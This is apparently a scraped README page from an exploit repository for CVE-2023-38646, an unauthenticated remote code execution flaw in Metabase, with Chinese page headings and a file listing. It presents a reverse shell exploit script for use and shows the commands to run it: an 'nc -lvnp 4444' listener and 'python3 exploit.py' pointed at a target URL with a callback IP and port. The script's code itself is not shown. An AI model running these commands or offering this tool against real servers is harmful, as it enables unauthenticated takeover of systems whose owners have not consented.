来源

关联漏洞

描述

CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase 

介绍

# CVE-2023-38646-exploit
"This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."

A quick reverse shell exploit script for cve-2023-38646.
I did not find this vulnerability, just made the script.


## Usage

    root@box:~/CVE-2023-38646# python3 exploit.py
    
       _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __
    
    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
    | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
    | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
    | |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
    \_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/
    
    author: c0rnbread
    credits:
    https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py


    Usage: python3 exploit.py <url> <local-ip> <local-port>
Run using base url and local IP and port for reverse shell
      
    root@box:~/CVE-2023-38646# nc -lvnp 4444
    
    root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

![image](https://github.com/nickswink/CVE-2023-38646/assets/57839593/33a91801-684c-4021-a8d6-378c4ea39d45)

### Credits
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py

文件快照

 [4.0K]  /data/pocs/720c60725b0410d36771378fe02cfa9de77597d9
├── [2.9K]  exploit.py
└── [1.6K]  README.md

0 directories, 2 files

备注